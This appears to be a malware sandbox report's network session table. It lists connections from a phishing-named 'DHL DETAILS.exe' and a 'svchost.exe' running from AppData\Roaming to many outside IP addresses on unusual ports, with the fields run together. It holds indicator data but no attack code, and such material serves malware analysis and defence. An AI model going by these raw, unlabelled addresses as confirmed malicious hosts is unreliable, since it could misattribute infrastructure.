                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7475192.168.2.552300212.118.43.143806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7476192.168.2.55213539.99.144.43806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7477192.168.2.553040133.18.234.13806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7478192.168.2.5525578.219.97.248806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7479192.168.2.553603172.67.181.126806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7480192.168.2.55172794.131.59.2415837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7481192.168.2.555810200.111.182.644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7482192.168.2.5535623.97.176.25131286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7483192.168.2.55332251.15.211.42163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7484192.168.2.550275125.227.225.15733896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7485192.168.2.553142119.28.60.6480906352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7486192.168.2.550075207.180.234.220377366352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7487192.168.2.555969200.111.182.644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7488192.168.2.556024200.111.182.644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7489192.168.2.556028200.111.182.644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7490192.168.2.554348172.67.3.108806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7491192.168.2.55315947.106.76.19680886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7492192.168.2.54941527.65.114.8108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7493192.168.2.55348118.133.16.21806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7494192.168.2.55402394.131.64.157583786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7495192.168.2.555230142.54.226.21441456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7496192.168.2.554312177.93.45.1549996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7497192.168.2.553751218.65.6.15031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7498192.168.2.553753195.87.217.7533896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7499192.168.2.554560219.243.212.11880806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7500192.168.2.55417994.130.94.45806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7501192.168.2.556030209.126.104.384005343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7502192.168.2.55559252.80.19.207312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7503192.168.2.556051162.214.227.685220843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7504192.168.2.55402394.131.64.1575837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7505192.168.2.55410943.231.22.228806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7506192.168.2.56490827.65.240.157108043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7507192.168.2.555585102.69.177.2421008143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7508192.168.2.563244159.223.71.715254256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7509192.168.2.556819142.54.226.214414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7510192.168.2.55665539.99.144.438043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7511192.168.2.55615747.91.104.88312843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7512192.168.2.556894162.240.72.1392559143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7513192.168.2.55028898.181.137.8041456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7514192.168.2.56349537.187.73.71036256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7515192.168.2.55677241.223.232.117312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7516192.168.2.551334107.180.88.41375976352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7517192.168.2.55171266.228.35.209565606352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7518192.168.2.54921195.31.5.295152856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7519192.168.2.556858172.104.251.1798043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7520192.168.2.56351861.7.138.243808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7521192.168.2.551377107.180.95.177582306352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7522192.168.2.56359652.151.210.204900056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7523192.168.2.553752192.111.137.3541456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7524192.168.2.551305119.23.148.173806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7525192.168.2.55711694.130.94.458043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7526192.168.2.563574177.234.244.1743221356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7527192.168.2.557125195.87.217.75338943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7528192.168.2.557404142.54.226.214414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7529192.168.2.551241180.250.159.4941536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7530192.168.2.557107193.151.130.114808643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7531192.168.2.557401185.38.111.1808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7532192.168.2.553454104.238.111.107458836352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7533192.168.2.55740713.37.89.201312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7534192.168.2.56364551.75.125.2084811456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7535192.168.2.557413221.224.44.91730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7536192.168.2.550592128.199.246.4880006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7537192.168.2.557494147.75.92.2518043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7538192.168.2.553274185.129.250.183267776352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7539192.168.2.55742627.65.240.157108043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7540192.168.2.555229147.124.212.31305086352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7541192.168.2.558027104.16.106.1548043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7542192.168.2.55792339.99.144.438043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7543192.168.2.549271113.53.3.242808143080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7544192.168.2.55610074.119.144.60414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7545192.168.2.55807238.162.23.127312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7546192.168.2.55815394.131.60.1995837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7547192.168.2.55792943.231.22.2288043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7548192.168.2.55793543.155.170.351567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7549192.168.2.56361345.11.95.165600256176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7550192.168.2.558275198.37.57.1128043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7551192.168.2.563831188.215.245.2358056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7552192.168.2.563815113.161.56.137312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7553192.168.2.555707138.2.73.157108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7554192.168.2.558764142.54.226.214414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7555192.168.2.558262160.153.245.1873174543220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7556192.168.2.558768177.234.244.1743221343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7557192.168.2.564080164.92.86.1136028356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7558192.168.2.55880894.130.94.458043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7559192.168.2.558738117.4.242.216567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7560192.168.2.558771119.23.148.1738043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7561192.168.2.559169195.87.217.75338943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7562192.168.2.54955345.11.95.165504743080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7563192.168.2.5594553.127.62.2528043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7564192.168.2.54957441.223.234.1163725956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7565192.168.2.55889312.186.205.1228043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7566192.168.2.559622114.156.77.107808043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7567192.168.2.559697162.214.121.11898943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7568192.168.2.559795199.102.105.242414543220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7569192.168.2.555787192.252.208.701428243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7570192.168.2.55964339.99.144.438043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7571192.168.2.558904183.80.130.9414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7572192.168.2.564150148.72.206.841481556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7573192.168.2.55709227.65.114.8108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7574192.168.2.54998969.167.169.46129036352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7575192.168.2.564076188.132.221.133808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7576192.168.2.55603198.178.72.211091943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7577192.168.2.55009896.9.74.55336526352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7578192.168.2.55016491.134.140.16025726352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7579192.168.2.56443764.227.108.253190856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7580192.168.2.561117104.16.226.68043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7581192.168.2.56067054.67.125.45312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7582192.168.2.560758172.93.213.1778043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7583192.168.2.55034368.169.60.22083806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7584192.168.2.561172104.19.109.2098043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7585192.168.2.55871850.63.12.1011755943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7586192.168.2.560376200.10.73.210567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7587192.168.2.5601755.252.23.220108143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7588192.168.2.56118874.119.144.60414543220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7589192.168.2.55923251.15.223.241637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7590192.168.2.56092691.134.140.1604904243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7591192.168.2.560612103.120.6.468043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7592192.168.2.561051106.105.218.2448043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7593192.168.2.56119518.167.191.223108043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7594192.168.2.554668174.75.211.22241456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7595192.168.2.56425384.47.145.189808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7596192.168.2.56028142.49.148.167900143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7597192.168.2.56434866.228.33.1901746456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7598192.168.2.561141172.67.181.98043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7599192.168.2.559367192.169.226.962961843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7600192.168.2.559370146.190.57.169312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7601192.168.2.56440382.210.56.2518056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7602192.168.2.564381185.151.146.178123456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7603192.168.2.55215138.242.136.254156256352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7604192.168.2.564529161.97.170.2096229156176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7605192.168.2.56446581.134.57.82312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7606192.168.2.55268937.187.77.58525936352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7607192.168.2.552273103.109.59.20910806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7608192.168.2.55955816.162.211.90108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7609192.168.2.55988437.187.77.585987043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7610192.168.2.55966151.158.105.1071637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7611192.168.2.559636103.76.148.92818143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7612192.168.2.564669212.110.188.1893440556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7613192.168.2.559739162.241.50.1793141443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7614192.168.2.554491153.19.91.77806352C:\Users\user\Desktop\DHL DETAILS.exe
